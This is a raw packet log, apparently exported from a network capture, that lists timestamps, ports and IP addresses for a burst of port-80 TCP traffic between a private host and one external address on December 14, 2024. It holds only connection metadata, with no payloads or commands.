Dec 14, 2024 12:56:44.241130114 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.242088079 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.242249012 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.242292881 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.243069887 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.243160963 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.243335962 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.243863106 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.244122028 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.244261026 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.245177984 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.245290995 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.245440960 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.245918036 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.246184111 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.246371984 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.246506929 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.246828079 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.247232914 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.247298956 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.247340918 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.247340918 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.248297930 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.248397112 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.248442888 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.248466015 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.249342918 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.249479055 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.249634981 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.249634981 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.250365973 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.250469923 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.250511885 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.250680923 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.251458883 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.251528025 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.251605034 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.251729965 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.252532005 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.252628088 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.252799034 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.253494978 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.253597021 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.253601074 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.253739119 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.254565954 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.254626989 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.254674911 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.254754066 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.255570889 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.255681038 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.255759001 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.256280899 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.256614923 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.256706953 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.256858110 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.257688046 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.257764101 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.257775068 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.257926941 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.258774042 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.258827925 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.259023905 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.259732008 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.259797096 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.259854078 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.260118961 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.260775089 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.260910034 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.260916948 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.261061907 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.261806011 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.261951923 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.261991024 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.262058973 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.262912989 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.263027906 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.263062000 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.263344049 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.263883114 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.263998985 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.264039040 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.264149904 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.265002966 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.265129089 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.265259981 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.265331984 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.265960932 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.266057014 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.266117096 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.267019033 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.267019987 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.267107964 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.267332077 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.268083096 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.268182039 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.268321037 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.268414974 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.269082069 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.269243002 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.269248009 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.269344091 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.270128012 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.270282030 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.270288944 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.270370960 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.271193981 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.271282911 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.271294117 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.271442890 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.272249937 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.272350073 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.272361040 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.273030996 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.273281097 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.273387909 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.273435116 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.273987055 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.274317026 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.274454117 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.274607897 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.275077105 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.275369883 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.275504112 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.275532007 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.275633097 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.276370049 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.276514053 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.276542902 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.276690006 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.277421951 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.277581930 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.277740002 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.278453112 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.278564930 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.278868914 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.279481888 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.279537916 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.279637098 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.280524015 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.280646086 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.280653000 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.281577110 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.281682014 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.281691074 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.282196999 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.282614946 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.282783985 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.282795906 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.283334970 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.283634901 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.283726931 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.283760071 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.284069061 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.284681082 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.284799099 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.284996986 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.285691023 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.286053896 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.423868895 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.424096107 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.424266100 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.424360991 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.424575090 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.424603939 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.424639940 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.424639940 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.425048113 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.425093889 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.425266981 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.425945997 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.426045895 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.426101923 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.426129103 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.426974058 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.427042007 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.427125931 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.427359104 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.428020000 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.428133965 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.428141117 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.428183079 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.429100990 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.429235935 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.429301023 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.429374933 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.430161953 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.430269003 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.430269957 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.430427074 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.431164026 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.431214094 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.431282997 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.431807041 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.432209015 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.432272911 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.432357073 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.432410002 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.433237076 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.433362007 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.433419943 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.433419943 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.434272051 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.434323072 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.434421062 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.434473038 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.435333014 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.435405970 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.435451031 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.435523033 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.436386108 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.436451912 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.436484098 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.436686993 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.437431097 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.437484026 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.437561035 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.437891006 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.438447952 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.438503981 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.438572884 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.438642979 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.439476967 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.439575911 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.439589977 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.439637899 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.440514088 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.440634966 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.440699100 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.441574097 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.441628933 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.441663980 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.441709042 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.442735910 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.442830086 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.442838907 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.443027973 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.443770885 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.443844080 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.443866968 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.443907976 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.444854975 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.444930077 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.445029020 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.445197105 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.445822954 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.445911884 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.445976019 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.446033001 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.446852922 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.446985960 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.447020054 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.447038889 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.447887897 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.447962046 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.448060036 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.448158026 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.448837996 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.448885918 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.448973894 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.449122906 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.449954987 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.450014114 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.450043917 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.450094938 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.451143980 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.451307058 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.451328993 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.451376915 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.452290058 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.452465057 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.452526093 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.453433037 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.453511000 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.453572035 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.454526901 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.454646111 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.454689026 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.455409050 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.455475092 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.455523968 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.455724001 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.456325054 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.456424952 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.456487894 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.457345009 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.457519054 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.457920074 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.458543062 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.458626032 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.458831072 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.459665060 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.459723949 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.459775925 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.460901976 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.461052895 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.461280107 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.462172985 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.462325096 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.462440014 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.463229895 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.463289022 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.463370085 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.463440895 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.464535952 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.464575052 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.464667082 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.465384960 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.465544939 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.465630054 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.466398001 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.466530085 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.466573000 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.467217922 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.467281103 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.467339993 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.467686892 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.468096972 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.468247890 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.468565941 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.469016075 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.469130993 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.469211102 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.470161915 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.470251083 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.470258951 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.470423937 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.470977068 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.471097946 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.471338034 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.472043991 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.472177029 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.472301006 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.472881079 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.472970009 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.473094940 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.473797083 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.473922968 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.474175930 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.474827051 CET	80	49860	31.41.244.11	192.168.2.4
